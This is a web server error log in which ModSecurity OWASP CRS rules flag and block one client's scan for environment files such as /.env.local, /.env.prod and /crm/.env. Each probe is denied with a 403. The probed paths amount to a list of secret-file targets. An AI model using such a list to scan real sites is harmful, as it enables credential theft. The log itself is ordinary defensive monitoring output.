[Sun Dec 07 06:15:52.394545 2025] [:error] [pid 575091] [client 195.178.110.108:51494] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.production.local"] [unique_id "aTUNiBJQiyL0bOqNK0sWwgAAAAc"]
[Sun Dec 07 06:15:52.394811 2025] [:error] [pid 575091] [client 195.178.110.108:51494] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.production.local"] [unique_id "aTUNiBJQiyL0bOqNK0sWwgAAAAc"]
[Sun Dec 07 06:15:52.394997 2025] [:error] [pid 575091] [client 195.178.110.108:51494] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.production.local"] [unique_id "aTUNiBJQiyL0bOqNK0sWwgAAAAc"]
[Sun Dec 07 06:15:54.824265 2025] [:error] [pid 573220] [client 195.178.110.108:51510] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aTUNiqxAi-0-oAL0IKmU7wAAAAI"]
[Sun Dec 07 06:15:54.824546 2025] [:error] [pid 573220] [client 195.178.110.108:51510] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aTUNiqxAi-0-oAL0IKmU7wAAAAI"]
[Sun Dec 07 06:15:54.824749 2025] [:error] [pid 573220] [client 195.178.110.108:51510] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aTUNiqxAi-0-oAL0IKmU7wAAAAI"]
[Sun Dec 07 06:15:58.107027 2025] [:error] [pid 575099] [client 195.178.110.108:48846] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aTUNjuplfNiR5IsYA3LJtAAAAAk"]
[Sun Dec 07 06:15:58.107272 2025] [:error] [pid 575099] [client 195.178.110.108:48846] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aTUNjuplfNiR5IsYA3LJtAAAAAk"]
[Sun Dec 07 06:15:58.107440 2025] [:error] [pid 575099] [client 195.178.110.108:48846] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aTUNjuplfNiR5IsYA3LJtAAAAAk"]
[Sun Dec 07 06:15:58.247875 2025] [:error] [pid 575099] [client 195.178.110.108:48846] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aTUNjuplfNiR5IsYA3LJtQAAAAk"]
[Sun Dec 07 06:15:58.248106 2025] [:error] [pid 575099] [client 195.178.110.108:48846] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aTUNjuplfNiR5IsYA3LJtQAAAAk"]
[Sun Dec 07 06:15:58.248315 2025] [:error] [pid 575099] [client 195.178.110.108:48846] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aTUNjuplfNiR5IsYA3LJtQAAAAk"]
[Sun Dec 07 06:15:58.458536 2025] [:error] [pid 575099] [client 195.178.110.108:48846] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.stage"] [unique_id "aTUNjuplfNiR5IsYA3LJtgAAAAk"]
[Sun Dec 07 06:15:58.458791 2025] [:error] [pid 575099] [client 195.178.110.108:48846] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.stage"] [unique_id "aTUNjuplfNiR5IsYA3LJtgAAAAk"]
[Sun Dec 07 06:15:58.458971 2025] [:error] [pid 575099] [client 195.178.110.108:48846] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.stage"] [unique_id "aTUNjuplfNiR5IsYA3LJtgAAAAk"]
[Sun Dec 07 06:15:58.825859 2025] [:error] [pid 575099] [client 195.178.110.108:48846] [client 195.178.110.108] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aTUNjuplfNiR5IsYA3LJuAAAAAk"]
[Sun Dec 07 06:15:58.825984 2025] [:error] [pid 575099] [client 195.178.110.108:48846] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aTUNjuplfNiR5IsYA3LJuAAAAAk"]
[Sun Dec 07 06:15:58.826197 2025] [:error] [pid 575099] [client 195.178.110.108:48846] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aTUNjuplfNiR5IsYA3LJuAAAAAk"]
[Sun Dec 07 06:15:58.826437 2025] [:error] [pid 575099] [client 195.178.110.108:48846] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aTUNjuplfNiR5IsYA3LJuAAAAAk"]
[Sun Dec 07 06:15:59.131071 2025] [:error] [pid 575099] [client 195.178.110.108:48846] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env_sample"] [unique_id "aTUNj-plfNiR5IsYA3LJuQAAAAk"]
[Sun Dec 07 06:15:59.131310 2025] [:error] [pid 575099] [client 195.178.110.108:48846] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env_sample"] [unique_id "aTUNj-plfNiR5IsYA3LJuQAAAAk"]
[Sun Dec 07 06:15:59.131531 2025] [:error] [pid 575099] [client 195.178.110.108:48846] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env_sample"] [unique_id "aTUNj-plfNiR5IsYA3LJuQAAAAk"]
[Sun Dec 07 06:16:00.050414 2025] [:error] [pid 575099] [client 195.178.110.108:48846] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aTUNkOplfNiR5IsYA3LJuwAAAAk"]
[Sun Dec 07 06:16:00.051279 2025] [:error] [pid 575099] [client 195.178.110.108:48846] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aTUNkOplfNiR5IsYA3LJuwAAAAk"]
[Sun Dec 07 06:16:00.051500 2025] [:error] [pid 575099] [client 195.178.110.108:48846] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aTUNkOplfNiR5IsYA3LJuwAAAAk"]
[Sun Dec 07 06:16:06.951804 2025] [:error] [pid 573218] [client 195.178.110.108:33476] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/crm/.env"] [unique_id "aTUNlv-86ve6IRoVOdG0UgAAAAA"]
[Sun Dec 07 06:16:06.952051 2025] [:error] [pid 573218] [client 195.178.110.108:33476] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/crm/.env"] [unique_id "aTUNlv-86ve6IRoVOdG0UgAAAAA"]
[Sun Dec 07 06:16:06.952751 2025] [:error] [pid 573218] [client 195.178.110.108:33476] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/crm/.env"] [unique_id "aTUNlv-86ve6IRoVOdG0UgAAAAA"]
[Sun Dec 07 06:16:09.350941 2025] [:error] [pid 575112] [client 195.178.110.108:33490] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "aTUNmVIBBWS88v5sLMHbTwAAAA4"]
[Sun Dec 07 06:16:09.351173 2025] [:error] [pid 575112] [client 195.178.110.108:33490] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "aTUNmVIBBWS88v5sLMHbTwAAAA4"]
[Sun Dec 07 06:16:09.351349 2025] [:error] [pid 575112] [client 195.178.110.108:33490] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "aTUNmVIBBWS88v5sLMHbTwAAAA4"]
[Sun Dec 07 06:16:09.464722 2025] [:error] [pid 575112] [client 195.178.110.108:33490] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aTUNmVIBBWS88v5sLMHbUAAAAA4"]
[Sun Dec 07 06:16:09.464973 2025] [:error] [pid 575112] [client 195.178.110.108:33490] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aTUNmVIBBWS88v5sLMHbUAAAAA4"]
[Sun Dec 07 06:16:09.465172 2025] [:error] [pid 575112] [client 195.178.110.108:33490] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aTUNmVIBBWS88v5sLMHbUAAAAA4"]
[Sun Dec 07 06:16:09.605019 2025] [:error] [pid 575112] [client 195.178.110.108:33490] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aTUNmVIBBWS88v5sLMHbUQAAAA4"]
[Sun Dec 07 06:16:09.605252 2025] [:error] [pid 575112] [client 195.178.110.108:33490] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aTUNmVIBBWS88v5sLMHbUQAAAA4"]
[Sun Dec 07 06:16:09.605438 2025] [:error] [pid 575112] [client 195.178.110.108:33490] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aTUNmVIBBWS88v5sLMHbUQAAAA4"]
[Sun Dec 07 06:16:09.722872 2025] [:error] [pid 575112] [client 195.178.110.108:33490] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aTUNmVIBBWS88v5sLMHbUgAAAA4"]
[Sun Dec 07 06:16:09.723134 2025] [:error] [pid 575112] [client 195.178.110.108:33490] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aTUNmVIBBWS88v5sLMHbUgAAAA4"]
[Sun Dec 07 06:16:09.723349 2025] [:error] [pid 575112] [client 195.178.110.108:33490] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aTUNmVIBBWS88v5sLMHbUgAAAA4"]
